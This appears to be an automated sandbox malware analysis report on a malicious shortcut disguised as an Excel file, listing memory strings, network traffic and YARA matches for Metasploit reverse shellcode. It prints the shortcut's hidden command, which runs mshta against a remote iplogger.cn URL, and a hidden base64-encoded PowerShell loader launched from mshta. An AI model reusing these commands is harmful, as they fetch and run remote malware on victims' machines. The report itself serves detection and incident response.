Source: powershell.exe, 00000000.00000002.1175679720.00000205748CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1156807846.0000020566129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1175679720.0000020574A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2059208626.000001E1D0823000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2059208626.000001E1D06E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1382248319.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1386504166.000000000715D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1156807846.0000020564851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2000051277.000001E1C0671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1370317295.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1156807846.0000020565CB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1386504166.000000000715D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2068241616.000001E1D8880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1156807846.0000020564851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2000051277.000001E1C0671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1370317295.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.1382248319.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1382248319.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1382248319.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000005.00000003.1211090216.0000020DBB842000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000005.00000003.1211090216.0000020DBB842000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1386504166.000000000715D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2000051277.000001E1C1878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: mshta.exe, 00000002.00000002.2087019154.000001B148900000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078490513.000001B1488F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2085620199.000001B1488FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2077055407.000001B1488FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/
Source: mshta.exe, 00000002.00000003.2078490513.000001B1488F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1169238850.000001B14895C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2086121058.000001B1488BD000.00000004.00000020.00020000.00000000.sdmp, ____ ______.xls.lnk.bin.lnk	String found in binary or memory: https://iplogger.cn/forensicsas.png
Source: mshta.exe, 00000002.00000002.2086880000.000001B1488A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/forensicsas.png/
Source: mshta.exe, 00000002.00000002.2086942294.000001B1488BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078490513.000001B1488BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2086121058.000001B1488BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/forensicsas.png3
Source: mshta.exe, 00000002.00000003.1169238850.000001B14895C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/forensicsas.png31536000
Source: mshta.exe, 00000002.00000002.2086880000.000001B1488A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/forensicsas.pngD
Source: mshta.exe, 00000002.00000002.2087288383.000001B148BF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/forensicsas.pngS_BROWSER_APP_
Source: mshta.exe, 00000002.00000002.2087634483.000001B94B510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/forensicsas.pngX
Source: mshta.exe, 00000002.00000002.2086880000.000001B148880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/forensicsas.pnge
Source: mshta.exe, 00000002.00000002.2086880000.000001B1488A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/forensicsas.pngf
Source: mshta.exe, 00000002.00000003.1169238850.000001B14895C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/forensicsas.png~
Source: mshta.exe, 00000002.00000002.2087019154.000001B148900000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078490513.000001B1488F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2085620199.000001B1488FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2077055407.000001B1488FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.cn/~
Source: mshta.exe, 00000002.00000002.2086942294.000001B1488BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078490513.000001B1488BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2086121058.000001B1488BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000006.00000002.1386881963.00000000071C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mcnn.ru/
Source: powershell.exe, 00000006.00000002.1368654410.0000000002D90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1389805083.000000000783F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mcnn.ru:8443/jquery-3.3.1.slim.min.js
Source: powershell.exe, 00000006.00000002.1368654410.0000000002D90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mcnn.ru:8443/jquery-3.3.1.slim.min.js(r
Source: powershell.exe, 00000006.00000002.1389805083.000000000783F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mcnn.ru:8443/jquery-3.3.1.slim.min.js6V
Source: powershell.exe, 00000006.00000002.1368654410.0000000002D90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mcnn.ru:8443/jquery-3.3.1.slim.min.js:r
Source: powershell.exe, 00000000.00000002.1175679720.00000205748CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1156807846.0000020566129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1175679720.0000020574A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2059208626.000001E1D0823000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2059208626.000001E1D06E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1382248319.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000005.00000003.1211090216.0000020DBB842000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000000.00000002.1156807846.0000020565CB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1156807846.0000020565CB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown

HTTPS traffic detected: 172.67.160.19:443 -> 192.168.2.4:49718 version: TLS 1.2

E-Banking Fraud

Malicious encrypted Powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVAB
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVAB			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7540.amsi.csv, type: OTHER	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: amsi32_7812.amsi.csv, type: OTHER	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: dump.pcap, type: PCAP	Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
Source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 Author: unknown
Source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000003.00000002.2000051277.000001E1C2463000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
Source: 00000003.00000002.2000051277.000001E1C0ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
Source: 00000003.00000002.2000051277.000001E1C2433000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000003.00000002.1997538671.000001E1BE6F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
Source: 00000003.00000002.2000051277.000001E1C2482000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000003.00000002.2000051277.000001E1C243E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 Author: unknown
Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000003.00000002.2000051277.000001E1C1878000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: Process Memory Space: mshta.exe PID: 7472, type: MEMORYSTR	Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR	Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7812, type: MEMORYSTR	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7812, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ecols[1].hta, type: DROPPED	Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth

Windows shortcut file (LNK) contains suspicious command line arguments

Source: ____ ______.xls.lnk.bin.lnk

LNK file: -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'"

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 6_2_077D00D7

6_2_077D00D7

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 7659
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 7659			Jump to behavior

Source: amsi64_7540.amsi.csv, type: OTHER	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: amsi32_7812.amsi.csv, type: OTHER	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: dump.pcap, type: PCAP	Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Shellcode.Generic, fingerprint = 834caf96192a513aa93ac48fb8d2f3326bf9f08acaf7a27659f688b26e3e57e4, id = 8c487e57-4b8c-488e-a1d9-786ff935fd2c, last_modified = 2022-07-18
Source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000003.00000002.2000051277.000001E1C2463000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
